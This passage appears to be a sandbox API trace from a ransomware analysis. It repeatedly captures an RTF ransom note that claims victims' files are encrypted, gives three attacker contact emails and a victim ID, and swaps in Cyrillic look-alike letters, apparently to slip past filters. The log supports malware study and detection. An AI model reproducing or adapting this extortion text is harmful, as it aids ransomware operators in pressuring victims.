\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 